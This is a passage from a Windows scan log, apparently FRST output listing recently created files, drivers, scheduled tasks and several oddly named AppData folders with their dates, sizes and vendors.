12:17 - 000000000 ____D C:\ProgramData\Malwarebytes 2017-08-01 12:15 - 2017-08-01 12:40 - 000109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys 2017-08-01 12:14 - 2017-08-01 12:53 - 000000000 ____D C:\Users\****\Desktop\mbar 2017-08-01 12:06 - 2017-08-01 12:06 - 016563352 _____ (Malwarebytes Corp.) C:\Users\****\Desktop\mbar-1.09.3.1001.exe 2017-08-01 03:41 - 2017-08-01 04:04 - 000000000 ____D C:\ProgramData\TEMP 2017-08-01 02:24 - 2017-08-01 02:24 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job 2017-08-01 02:17 - 2017-08-01 02:17 - 002381312 _____ (Farbar) C:\Users\****\Desktop\FRST64.exe 2017-08-01 02:04 - 2017-08-01 03:19 - 000000000 ____D C:\Users\****\AppData\LocalLow\Mozilla 2017-08-01 02:04 - 2017-08-01 03:14 - 000000000 ____D C:\Users\****\AppData\Local\Mozilla 2017-08-01 01:54 - 2017-08-01 01:54 - 000003628 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA 2017-08-01 01:54 - 2017-08-01 01:54 - 000003504 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore 2017-08-01 01:54 - 2017-08-01 01:54 - 000002302 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2017-08-01 01:54 - 2017-08-01 01:54 - 000002290 _____ C:\Users\Public\Desktop\Google Chrome.lnk 2017-07-31 20:21 - 2017-07-31 20:21 - 000000000 ____D C:\Users\****\AppData\Local\PDF24 2017-07-28 19:41 - 2017-07-19 00:38 - 000135800 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe 2017-07-28 19:41 - 2017-03-10 23:17 - 000536864 _____ C:\WINDOWS\system32\vulkan-1.dll 2017-07-28 19:41 - 2017-03-10 23:17 - 000525600 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll 2017-07-28 19:41 - 2017-03-10 23:17 - 000254240 _____ C:\WINDOWS\system32\vulkaninfo.exe 2017-07-28 19:41 - 2017-03-10 23:17 - 000233760 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe 2017-07-28 19:39 - 2017-07-19 02:40 - 040239736 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcompiler.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 035844728 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 035314296 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcompiler.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 028960376 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 013655672 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 012451424 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 012133112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvptxJitCompiler.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 011591576 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 010487760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 009982968 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvptxJitCompiler.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 004210032 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 004163520 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 003711328 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 003595896 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 001988216 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6438494.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 001598072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6438494.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 001278528 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFTH264.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 001276992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFThevc.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 001068152 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 001004992 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000996760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFTH264.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000995408 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFThevc.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000972920 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000924280 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000781544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000725112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvDecMFTMjpeg.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000689992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvfatbinaryLoader.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000618744 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmcumd.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000617416 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000609912 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000584312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvDecMFTMjpeg.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000578056 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvfatbinaryLoader.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000499136 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll 2017-07-28 19:39 - 2017-07-19 02:40 - 000057792 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvhci.sys 2017-07-28 19:39 - 2017-07-19 02:40 - 000046463 _____ C:\WINDOWS\system32\nvinfo.pb 2017-07-28 19:39 - 2017-07-19 02:40 - 000000669 _____ C:\WINDOWS\SysWOW64\nv-vk32.json 2017-07-28 19:39 - 2017-07-19 02:40 - 000000669 _____ C:\WINDOWS\system32\nv-vk64.json 2017-07-28 18:14 - 2017-07-28 18:14 - 000004308 _____ C:\WINDOWS\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-07-28 18:14 - 2017-07-28 18:14 - 000004000 _____ C:\WINDOWS\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-07-28 18:14 - 2017-07-28 18:14 - 000003994 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-07-28 18:14 - 2017-07-26 19:09 - 001922496 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll 2017-07-28 18:14 - 2017-07-26 19:09 - 001505728 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll 2017-07-28 18:13 - 2017-07-28 18:13 - 000003894 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-07-28 18:13 - 2017-07-28 18:13 - 000003866 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-07-28 18:13 - 2017-07-28 18:13 - 000003858 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-07-28 18:13 - 2017-07-28 18:13 - 000003696 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-07-28 18:13 - 2017-07-28 18:13 - 000003654 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} 2017-07-28 18:13 - 2017-07-26 19:09 - 000048064 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys 2017-07-26 21:16 - 2017-08-01 04:05 - 000000000 ____D C:\Users\****\AppData\Local\Usidikujp 2017-07-26 21:16 - 2017-08-01 04:05 - 000000000 ____D C:\Users\****\AppData\Local\Rvurcez 2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\****\AppData\Local\Yhwopc 2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\****\AppData\Local\Wqy He 2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\****\AppData\Local\Bizpiwcinu 2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\****\AppData\Local\Bgew 2017-07-24 19:44 - 2017-07-26 19:09 - 000179136 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll 2017-07-24 19:44 - 2017-07-26 19:09 - 000146368 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll 2017-07-16 11:47 - 2017-07-16 11:47 - 001804696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WdfCoInstaller01011.dll 2017-07-16 11:47 - 2017-07-16 11:47 - 000032840 _____ (ELAN Microelectronic Corp.) C:\WINDOWS\system32\Drivers\ETDSMBus.sys 2017-07-15 22:59 - 2017-07-15 22:59 - 000000000 ____D C:\Users\****\AppData\LocalLow\Thunder Lotus Games 2017-07-15 22:51 - 2017-07-15 22:51 - 000001418 _____ C:\Users\Public\Desktop\Darkest Dungeon.lnk 2017-07-12 19:41 - 2017-06-30 16:47 - 000835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2017-07-12 19:41 - 2017-06-30 16:47 - 000177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl 2017-07-11 20:54 - 2017-07-07 16:00 - 000947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\HoloSI.PCShell.dll 2017-07-11 20:54 - 2017-07-07 09:24 - 000117664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys 2017-07-11 20:54 - 2017-07-07 09:23 - 002399728 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll 2017-07-11 20:54 - 2017-07-07 09:21 - 032688336 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsRaw.dll 2017-07-11 20:54 - 2017-07-07 09:20 - 002021680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll 2017-07-11 20:54 - 2017-07-07 09:20 - 000519584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys 2017-07-11 20:54 - 2017-07-07 09:13 - 000554392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS 2017-07-11 20:54 - 2017-07-07 09:13 - 000336320 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe 2017-07-11 20:54 - 2017-07-07 09:11 - 000094624 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll 2017-07-11 20:54 - 2017-07-07 09:10 - 001670496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll 2017-07-11 20:54 - 2017-07-07 09:10 - 001325968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll 2017-07-11 20:54 - 2017-07-07 09:10 - 000254168 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll 2017-07-11 20:54 - 2017-07-07 09:07 - 001106848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys 2017-07-11 20:54 - 2017-07-07 09:07 - 000058488 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe 2017-07-11 20:54 - 2017-07-07 08:57 - 000626528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe 2017-07-11 20:54 - 2017-07-07 08:57 - 000125344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmapi.dll 2017-07-11 20:54 - 2017-07-07 08:40 - 023677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll 2017-07-11 20:54 - 2017-07-07 08:39 - 001839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\KernelBase.dll 2017-07-11 20:54 - 2017-07-07 08:39 - 000096128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dmcmnutils.dll 2017-07-11 20:54 - 2017-07-07 08:37 - 031652264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsRaw.dll 2017-07-11 20:54 - 2017-07-07 08:37 - 002259760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll 2017-07-11 20:54 - 2017-07-07 08:37 - 001339352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpmde.dll 2017-07-11 20:54 - 2017-07-07 08:31 - 005820984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll 2017-07-11 20:54 - 2017-07-07 08:31 - 001518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll 2017-07-11 20:54 - 2017-07-07 08:31 - 000129184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll 2017-07-11 20:54 - 2017-07-07 08:30 - 002165752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll 2017-07-11 20:54 - 2017-07-07 08:30 - 000949920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dcomp.dll 2017-07-11 20:54 - 2017-07-07 08:30 - 000750496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WWAHost.exe 2017-07-11 20:54 - 2017-07-07 08:29 - 000349600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll 2017-07-11 20:54 - 2017-07-07 08:29 - 000123520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Clipc.dll 2017-07-11 20:54 - 2017-07-07 08:27 - 006759512 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll 2017-07-11 20:54 - 2017-07-07 08:27 - 000557568 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll 2017-07-11 20:54 - 2017-07-07 08:26 - 020373408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll 2017-07-11 20:54 - 2017-07-07 08:26 - 001529384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll 2017-07-11 20:54 - 2017-07-07 08:26 - 001195240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioEng.dll 2017-07-11 20:54 - 2017-07-07 08:26 - 000988168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ole32.dll 2017-07-11 20:54 - 2017-07-07 08:25 - 000035232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininitext.dll 2017-07-11 20:54 - 2017-07-07 08:23 - 000583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll 2017-07-11 20:54 - 2017-07-07 08:23 - 000110592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll 2017-07-11 20:54 - 2017-07-07 08:23 - 000095232 _____ (Microsoft Corporation) C:\WINDOWS\system32\wudriver.dll 2017-07-11 20:54 - 2017-07-07 08:20 - 023681536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll 2017-07-11 20:54 - 2017-07-07 08:20 - 008331264 _____ (Microsoft Corporation) C:\WINDOWS\system32\BingMaps.dll 2017-07-11 20:54 - 2017-07-07 08:20 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\prntvpt.dll 2017-07-11 20:54 - 2017-07-07 08:19 - 007149056 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll 2017-07-11 20:54 - 2017-07-07 08:19 - 000165888 _____ (Microsoft Corporation) C:\WINDOWS\system32\storewuauth.dll 2017-07-11 20:54 - 2017-07-07 08:18 - 000548864 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll 2017-07-11 20:54 - 2017-07-07 08:17 - 000692736 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll 2017-07-11 20:54 - 2017-07-07 08:17 - 000588800 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll 2017-07-11 20:54 - 2017-07-07 08:17 - 000422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll 2017-07-11 20:54 - 2017-07-07 08:16 - 012786176 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll 2017-07-11 20:54 - 2017-07-07 08:16 - 000545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv 2017-07-11 20:54 - 2017-07-07 08:15 - 008238080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll 2017-07-11 20:54 - 2017-07-07 08:14 - 008211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll 2017-07-11 20:54 - 2017-07-07 08:14 - 003784704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll 2017-07-11 20:54 - 2017-07-07 08:14 - 002956800 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys 2017-07-11 20:54 - 2017-07-07 08:14 - 001448960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll 2017-07-11 20:54 - 2017-07-07 08:14 - 000790016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll 2017-07-11 20:54 - 2017-07-07 08:14 - 000570880 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr 2017-07-11 20:54 - 2017-07-07 08:13 - 013839872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll 2017-07-11 20:54 - 2017-07-07 08:12 - 004730880 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll 2017-07-11 20:54 - 2017-07-07 08:12 - 002199552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll 2017-07-11 20:54 - 2017-07-07 08:12 - 001142272 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll 2017-07-11 20:54 - 2017-07-07 08:12 - 000706560 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe 2017-07-11 20:54 - 2017-07-07 08:11 - 001812480 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll 2017-07-11 20:54 - 2017-07-07 08:10 - 000079872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wudriver.dll 2017-07-11 20:54 - 2017-07-07 08:10 - 000025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapprovp.dll 2017-07-11 20:54 - 2017-07-07 08:09 - 020504576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll 2017-07-11 20:54 - 2017-07-07 08:09 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll 2017-07-11 20:54 - 2017-07-07 08:08 - 000285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys 2017-07-11 20:54 - 2017-07-07 08:07 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll 2017-07-11 20:54 - 2017-07-07 08:07 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\raschap.dll 2017-07-11 20:54 - 2017-07-07 08:06 - 000412160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll 2017-07-11 20:54 - 2017-07-07 08:06 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsExt.dll 2017-07-11 20:54 - 2017-07-07 08:06 - 000205824 _____ (Microsoft Corporation) C:\WINDOWS\system32\sensrsvc.dll 2017-07-11 20:54 - 2017-07-07 08:05 - 019335168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll 2017-07-11 20:54 - 2017-07-07 08:05 - 011870720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2017-07-11 20:54 - 2017-07-07 08:05 - 006728192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll 2017-07-11 20:54 - 2017-07-07 08:05 - 005719040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\BingMaps.dll 2017-07-11 20:54 - 2017-07-07 08:05 - 000502784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DevicePairing.dll 2017-07-11 20:54 - 2017-07-07 08:05 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Wldap32.dll 2017-07-11 20:54 - 2017-07-07 08:04 - 005961216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll 2017-07-11 20:54 - 2017-07-07 08:04 - 001248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll 2017-07-11 20:54 - 2017-07-07 08:04 - 000754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll 2017-07-11 20:54 - 2017-07-07 08:04 - 000506368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll 2017-07-11 20:54 - 2017-07-07 08:04 - 000394240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Management.dll 2017-07-11 20:54 - 2017-07-07 08:03 - 006123520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll 2017-07-11 20:54 - 2017-07-07 08:03 - 000636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll 2017-07-11 20:54 - 2017-07-07 08:03 - 000446464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rastls.dll 2017-07-11 20:54 - 2017-07-07 08:02 - 000952832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comdlg32.dll 2017-07-11 20:54 - 2017-07-07 08:02 - 000508416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr 2017-07-11 20:54 - 2017-07-07 08:01 - 006287360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll 2017-07-11 20:54 - 2017-07-07 08:01 - 002859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll 2017-07-11 20:54 - 2017-07-07 08:00 - 007596544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll 2017-07-11 20:54 - 2017-07-07 08:00 - 005225984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll 2017-07-11 20:54 - 2017-07-07 08:00 - 002588160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll 2017-07-11 20:54 - 2017-07-07 08:00 - 001626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll 2017-07-11 20:54 - 2017-07-07 08:00 - 001565184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll 2017-07-11 20:54 - 2017-07-07 08:00 - 001019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll 2017-07-11 20:54 - 2017-07-07 07:59 - 004417024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll 2017-07-11 20:54 - 2017-07-07 07:59 - 003656704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2017-07-11 20:54 - 2017-07-07 07:59 - 001494016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll 2017-07-11 20:54 - 2017-07-07 07:59 - 001355264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpcServices.dll 2017-07-11 20:54 - 2017-07-07 07:59 - 000787456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll 2017-07-11 20:54 - 2017-07-07 07:58 - 004559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll 2017-07-11 20:54 - 2017-07-07 07:58 - 002782720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll 2017-07-11 20:54 - 2017-07-07 07:58 - 002298368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll 2017-07-11 20:54 - 2017-07-07 07:58 - 001237504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll 2017-07-11 20:54 - 2017-07-07 07:55 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPhoto.dll 2017-07-11 20:54 - 2017-07-07 07:55 - 000329216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsApi.dll 2017-07-11 20:54 - 2017-07-07 07:53 - 001301504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdc.dll 2017-07-11 20:54 - 2017-07-07 07:53 - 000338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msinfo32.exe 2017-07-11 20:54 - 2017-06-20 08:11 - 000411992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAudDecMFT.dll 2017-07-11 20:54 - 2017-06-20 08:08 - 001242528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys 2017-07-11 20:54 - 2017-06-20 08:06 - 000279968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\msiscsi.sys 2017-07-11 20:54 - 2017-06-20 08:03 - 000820128 _____ (Microsoft Corporation) C:\WINDOWS\system32\WWAHost.exe 2017-07-11 20:54 - 2017-06-20 08:02 - 001055648 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll 2017-07-11 20:54 - 2017-06-20 07:59 - 006554928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll 2017-07-11 20:54 - 2017-06-20 07:59 - 001220072 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll 2017-07-11 20:54 - 2017-06-20 07:59 - 000467504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll 2017-07-11 20:54 - 2017-06-20 07:57 - 002681760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys 2017-07-11 20:54 - 2017-06-20 07:34 - 000192416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll 2017-07-11 20:54 - 2017-06-20 07:15 - 000455104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAudDecMFT.dll 2017-07-11 20:54 - 2017-06-20 07:13 - 000787712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll 2017-07-11 20:54 - 2017-06-20 07:13 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModelOOBE.exe 2017-07-11 20:54 - 2017-06-20 07:12 - 000293376 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe 2017-07-11 20:54 - 2017-06-20 07:12 - 000115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys 2017-07-11 20:54 - 2017-06-20 07:12 - 000086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hdaudbus.sys 2017-07-11 20:54 - 2017-06-20 07:11 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll 2017-07-11 20:54 - 2017-06-20 07:10 - 000722432 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll 2017-07-11 20:54 - 2017-06-20 07:10 - 000096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll 2017-07-11 20:54 - 2017-06-20 07:09 - 000551424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Payments.dll 2017-07-11 20:54 - 2017-06-20 07:09 - 000406032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\policymanager.dll 2017-07-11 20:54 - 2017-06-20 07:09 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Narrator.exe 2017-07-11 20:54 - 2017-06-20 07:09 - 000140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll 2017-07-11 20:54 - 2017-06-20 07:08 - 004469840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe 2017-07-11 20:54 - 2017-06-20 07:08 - 000646656 _____ (Microsoft Corporation) 